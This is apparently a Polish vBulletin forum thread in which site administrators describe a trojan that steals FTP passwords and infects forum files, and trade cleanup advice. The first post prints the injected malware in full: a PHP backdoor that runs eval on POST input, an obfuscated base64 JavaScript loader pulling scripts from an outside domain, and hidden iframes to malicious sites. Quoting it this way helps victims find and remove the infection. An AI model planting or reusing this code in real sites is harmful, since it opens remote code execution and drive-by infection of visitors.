Postanowiłęm opisać sprawę , wczoraj złapałem trojana, który przechwytuje z total commandera, i prawdopodobnie z fileziili hasła, po czym pakuje sie na ftp wszystkich kont które znalazł.

podczas wchodzenia na stronę strona się zamula łąduje się do 83-95% i stoi, a w tym moemncie próbuje się załadowac trojanek do naszego pc, jeżeli ktoś ma pożadnego antywira to on go zblokuje co w ekecie da wizaca stronę na tych 85% jeżeli trojanik się załaduje bo np do ochrony uzywamy pandy ;] bo zwierzaki wiedzą tyle o wirusach to pozaładawoaniu trojana strona nam się w mig ładuje do konca ;]

otóz ten kochany trojanek miesza róznież w plikach, jego wczesniejsza wersja motała tylko index.php i index.html, ale nowy heeee, 12 godzin przed kompem żeby go namierzyć wiec opisze co i jak na przykładzie vb, bo tam tem mi wlazł ;] jak ktoś złapie to samo to bez paniki da się wyczyściic ;]

wiec, trojan miesza w plikach w plikach które maja w nazwie:

index, admin, functions, mod, page, config, md5, oraz wszysckich o roższezeniu "js" , od vbseo w includes wszystkie łapie równiez

w pisy w indexach wyglądaja tak że na górze dodaje:

Kod:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBMZ0o9JyUnO3ZhciBQUVhmeT0oJ3ZhcjwyMGE8M2Q8MjJTPDYzcmlwdEU8NmVnPDY5bjw2NTwyMjwyY2I8M2Q8MjJWZXJzaW9uPDI4KTwyYjwyMjwyY2o8M2Q8MjI8MjI8MmN1PDNkPDZlPDYxPDc2aWdhdG88NzI8MmV1c2VyQWc8NjU8NmV0PDNiaWYoKHU8MmVpbmRleE88NjYoPDIyVzw2OW48MjIpPDNlMCk8MjY8MjYodTwyZWluZGU8NzhPPDY2KDwyMk5UPDIwPDM2PDIyPDI5PDNjMCk8MjY8MjYoZG88NjN1PDZkZW48NzQ8MmVjb29raWU8MmU8NjluZGV4T2YoPDIybWllazwzZDE8MjIpPDNjPDMwKTwyNjwyNih0PDc5cDw2NW9mKHpydnp0PDczPDI5PDIxPDNkPDc0eXBlb2YoPDIyQTwyMikpKTw3Ynpydnp0czwzZDwyMjw0MTwyMjwzYjw2NTw3NmFsKDwyMjw2OWYodzw2OTw2ZWQ8NmY8Nzc8MmU8MjIrPDYxKzwyMilqPDNkais8MjI8MmJhKzwyMk1hPDZhPDZmPDcyPDIyK2I8MmJhKzwyMk1pbjw2ZnI8MjIrYithKzwyMjw0Mjw3NWlsZDwyMis8NjIrPDIyajwzYjwyMjwyOTwzYjw2NDw2ZmN1bWVudDwyZXdyaXRlPDI4PDIyPDNjc2NyaXB0PDIwc3I8NjM8M2Q8MmY8MmY8Njd1bWJsPDYxPDcyPDJlPDYzbjwyZnJzczwyZjwzZmk8NjQ8M2Q8MjIrPDZhKzwyMjwzZTwzYzw1YzwyZjw3M2M8NzI8NjlwdDwzZTwyMik8M2I8N2QnKS5yZXBsYWNlKC88L2csTGdKKTtldmFsKHVuZXNjYXBlKFBRWGZ5KSl9KSgpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

a na koniec :

Kod:

<center><a style="color:white;" href="http://hoxxybydesign.com/">hoxxybydesign.com</a><br />
<a style="color:white;" href="vbteam.info">vbteam.info</a><br /></center>
<iframe src="http://quoasty.com/?click=7CCF9B" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://internetcountercheck.com/?click=31085375" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="http://greatliteautobest.cn/ts/in.cgi?mozila15" width=2 height=4 style="visibility: hidden"></iframe>

na końcu czasem jest inny od 1 do 3 iframów ;]


co do plików js to łądnie nam lokuje na samym dole taki kodzik:

Kod:

<!-- 
(function(){var LgJ='%';var PQXfy=('var<20a<3d<22S<63riptE<6eg<69n<65<22<2cb<3d<22Version<28)<2b<22<2cj<3d<22<22<2cu<3d<6e<61<76igato<72<2euserAg<65<6et<3bif((u<2eindexO<66(<22W<69n<22)<3e0)<26<26(u<2einde<78O<66(<22NT<20<36<22<29<3c0)<26<26(do<63u<6den<74<2ecookie<2e<69ndexOf(<22miek<3d1<22)<3c<30)<26<26(t<79p<65of(zrvzt<73<29<21<3d<74ypeof(<22A<22)))<7bzrvzts<3d<22<41<22<3b<65<76al(<22<69f(w<69<6ed<6f<77<2e<22+<61+<22)j<3dj+<22<2ba+<22Ma<6a<6f<72<22+b<2ba+<22Min<6fr<22+b+a+<22<42<75ild<22+<62+<22j<3b<22<29<3b<64<6fcument<2ewrite<28<22<3cscript<20sr<63<3d<2f<2f<67umbl<61<72<2e<63n<2frss<2f<3fi<64<3d<22+<6a+<22<3e<3c<5c<2f<73c<72<69pt<3e<22)<3b<7d').replace(/</g,LgJ);eval(unescape(PQXfy))})();
 -->

to tyle, generalnie pakuje wszedzie gdzie się da, wszystkie puste index.html w kazdym folderku od stylu z grafami np. juz nie jest pusty etc, no przejrzec trzeba wszystko to co podałem wyżej ;]


tak więc jak ktoś złapie syfa - nie panikuj !!!! ;]

rada - nie przechowywać hasła w commanderze

jkaby ktoś szukał info o tym trojanie to tu jest troche:

Kod:

http://cs-puchatek.pl/topics189/wirusy-na-forum-problem-dotykajacy-wiele-for-vt22181.htm

No umnie tez z tym jazda na maxa :mad:Ledwo postawiłem wszystko na nogi i nie minelo dwa dni i masz , dzis trojany jak sie patrzy avast głównie sie pluje ,nie mam sily juz tego naprawiac.Zastanawiam sie czy da sie to reklamowac w Jelsoft Enterprises Ltd.

Nie zapomnijcie zmienić danych do ftp.

Zamieszczone przez Ds-Box

Zastanawiam sie czy da sie to reklamowac w Jelsoft Enterprises Ltd.

A co ma do tego Jelsoft? To nie ich wina, że tak się zabezpieczyłeś.

U mnie też szlag trafił panel admina w jednym z 2 moich for. Wyświetla się biała stona, tak jak to Davred zapodał w kodzie trojana.

trojek się aktywuje o 20, pewnie gdzieś ma w rejestrze wywołanie czasowe, ale plik łąduje się do tempa u mnie był usunęłem go i cisza, teraz ok, ból taki ze antywir nie wyjkrywał go, łapał tylko te nowe sciagane przy wchodzeniu na strone juz zainfekowana, wiec radzę poszperać u siebie, bo jak masz syfa na hdd do będziesz się w kółko bawić z nim . ;]

no to wyczysciłem moje fora, po zrobieniu moich 6 for to mozna powiedziec ze już specem od czyszczenia po tym trojanie ejstem ;] jakby co to piszcie to pomoge ;] bo wiem o tym trojanie i jego działąniach w vb all ;]

edit-------

sory Max, niech ktoś scali te moje 2 tematy bo kliknęło się ;]

Moje forum dziś tez opętał ten virus :mad: programu total comander nie używam w cale hasel tez nie zapamiętuje program antywirusowy kasperski naradzie się pozbyłem tego virusa ale ciekawe co dalej będzie.

jakie polecacie programy ja używam FileZilla


i jeszcze taki szajs mi wyskakuje gdzie to może być?

Davred pisał że prawdopodobnie z Filezilli tez łapie, więc masz. Ja dalej czyszcze, ominąłem wczesniej indeksy html, a tam tez siedzi dziadostwo.